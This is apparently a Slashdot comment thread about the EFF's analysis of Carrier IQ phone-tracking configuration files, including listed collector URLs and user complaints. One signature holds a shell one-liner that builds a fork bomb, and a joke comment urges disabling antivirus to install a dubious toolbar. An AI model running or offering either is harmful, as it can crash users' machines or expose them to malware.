EFF Reverse Engineers Carrier IQ
MrSeb writes "At this point we have a fairly good idea of what Carrier IQ is, and which manufacturers and carriers see fit to install it on their phones, but the Electronic Frontier Foundation — the preeminent protector of your digital rights — has taken it one step further and reverse engineered some of the program's code to work out what's actually going on. There are three parts to a Carrier IQ installation on your phone: The program itself, which captures your keystrokes and other 'metrics'; a configuration file, which varies from handset to handset and carrier to carrier; and a database that stores your actions until it can be transmitted to the carrier. It turns out that that the config profiles are completely unencrypted, and thus very easy to crack."
...why would anyone have to crack it? Just open and read it. BRB, I'm going to 'crack' these jpegs of naked ladies.
According to the article, almost nothing has been reverse engineered and at best you get "a hint of what data is being captured" from examining an unencrypted config file
This posting is provided 'AS IS' without warranty of any kind, implied or otherwise.
Are they actually transmitting my keystrokes to the carrier/google?
why does a story about carrier iq have the android icon on it?
It's hard to believe that's how Micronians are made. Why don't we see it right now by having you both kiss one another?
All it needs now is a $5 per Android handset "licensing fee" and you've got your smoking gun!
If you haven't done so yet this year, it's time to go donate a few bucks to EFF.
I wouldn't bring it up if we didn't need them so bad.
I'm in for another fifty, just because I saw this story and it's fucking Christmas and if SOPA passes we might as well kiss our Internet goodbye.
You are welcome on my lawn.
At the risk of being modded down, I think that if there is not already legislation to protect people from this type of spying then there should be.
blindly antisocialist = antisocial
Of course we hope people can also send us Profiles from Windows Mobile, BlackBerry, iPhone and "feature phone" ports of Carrier IQ.
I'd settle for more info about "c" on the machines collecting data.
grep -H https *.xml
att-galaxy-s2-defaultProfile.pro.xml: UploadUrl="https://ciqcol01.ciq.labs.att.com:10010/collector/c">
htc-amaze-tmob-defaultProfile.pro.xml: UploadUrl="https://oddca.t-mobile.com/collector/c">
htc-evo-sprint-iqprofile.pro.xml: UploadUrl="https://collector.iota.spcsdns.net:10003/collector/c">
tmob-galaxy-s2-defaultProfile.pro.xml: UploadUrl="https://oddca.t-mobile.com/collector/c">
I was able to get ciqcol01.ciq.labs.att.com 10010 to respond with telnet; but, it dropped my connection when I sent GET/POST etc. The others didn't respond. I'm assuming they have been moved.
Having to work for a living is the root of all evil.
Why isn't there a wikipedia page on Carrier IQ, the software? There's only one on the company? Wiki wars?
We know it's on android, but the article points to an earlier article that says, "In our post yesterday, we wrongly assumed that Carrier IQ was something that carriers added to smartphones — but now it’s clear that Apple bakes Carrier IQ into its closed-source iOS for use by carriers."
This makes me suspicious that there may be a version in Windows-based phones, or other phones with different data OS' installed.
"The mind works quicker than you think!"
So not only are you possibly able to invade my privacy, but you're also charging me for the bandwidth to do it? I'm sure the TOS doesn't cover you for the later.
09 F9 11 02 9D 74 E3 5B - D8 41 56 C5 63 56 88 C0 45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
I was asked as part of a recent job interview the following question: "What do you like least about your favorite programming language?"
Forth, that it's not more widely used.
Apparently, I was wrong
Of course there will be. The legislation will say "you may continue to spy as long as we get a cut".
No, that wasn't a joke.
http://www.cyanogenmod.com/blog/cyanogenmod-will-never-have-carrier-iq
Most non-OEM ROMs do not have Carrier IQ.
It took a picture of my dick and tweeted it :(
Tony Weiner.
It took a picture of my tits and tweeted it!
Hayley Williams
The EFF isn't the preeminent protector of your digital rights. The lordpwnalot toolbar is. It protects against Adware, spyware, and all sorts of other capitalist things.
http://www.lordpwnalot.cn/
Note : many antivirus software will give a false positive and you may need to disable it to install.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
Yes.. because I want to drop my pants to install some chinese crap recommended by who exactly?
It's lordpwnalot. Surely, you can trust him.
For every benefit you receive a tax is levied. - Ralph Waldo Emerson
It took a picture of my tits and dick, and tweeted it!
Chas Bono
My big problem with CarrierIQ has not been concerns over privacy (I just assume the carrier can see anything I send over their network) but the fact that it is both buggy and unstoppable. I was in the middle of nowhere when I noticed that my Atrix 2 was nearly dead (I had charged it that morning). Checking the battery monitor showed that "Device Health Applicaton" had sucked down 80% of my battery, and had been using GPS for 6 hours strait. Of course you can not force it to quit, que stream of [explative-deleted]. I was able to stop the bleeding by switching off GPS, and a cold boot restored functionality. Still, having an application that can murder performance, but that you can not kill or remove, seems like bad form at the very least.
They didn't duplicate functionality with nothing to go on but the black box of how it works. They had direct reference material from which they could produce human readable code to duplicate functionality. That isn't reverse engineering, that's copying.
I think it is time to start digging to the Radio Images that are provided by the phone vendors. WHAT are they tracking and WHO are they reporting to?
So far my understanding is there is open dialog between Carrier IQ and the FCC and FTC. there is an inquiry and no one is being arrested and no agents showing up on their door step. This will all go away I am sure.
I believe Trevor had his detection tool removed from the android market place. I don't know if it was put back. There have been other reports to that other developers are saying the the bloggers initial inspection of what the software does is in fact wrong.
I truly believe the software is simply diagnostics. I know lots of screaming and yelling and freaking out over a video, which if you are technically inclined is inaccurate
for all intense and purposes. Just look at what others have reported after reverse engineering the product and also watching how the software processes and reads information. The "security researcher" if you want to call him that works for a company called Telogis. I hear they are trying to get up to the race with Carrier IQ. What better way than to get the leader shut down and you quietly slip into the vacuum that is left behind. If you don't believe me check out the bloggers linked in
profile.
I think he was asked to do this as corporate espionage, and then they will control it all. Al bet a little differently.
I am just asking.
Seriously so you create a database of profiles, what god does that do? If we take the article on Carrier IQ's website at face value and then consider ok so we know that the profiles, would match one of the following criteria, what does it do?
I think the EFF knows Trevor messed up and they are grasping for straws now. They also know he works for Telogis which is a competitor, so that is something that is going to bite them later as well.
lol?
Bow before me, for I am root.